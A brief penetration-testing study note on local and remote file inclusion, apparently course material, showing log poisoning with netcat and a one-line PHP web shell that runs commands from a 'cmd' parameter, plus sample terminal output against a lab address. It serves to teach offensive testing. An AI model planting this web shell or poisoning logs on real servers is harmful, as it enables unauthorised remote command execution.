Local File Inclusion / Remote File Inclusion (LFI/RFI)

LFI

LFI means that we can include local file. We could inject the code into the server by contaminating the log files. Then loading the log file, our code would be executed.

This can be done with the netcat:

nc -nv <target_ip> 80

Once connected, send the php code:

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Expected output:

kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
HTTP/1.1 400 Bad Request

RFI

Basically the same as LFI except the file location comes from an external URL.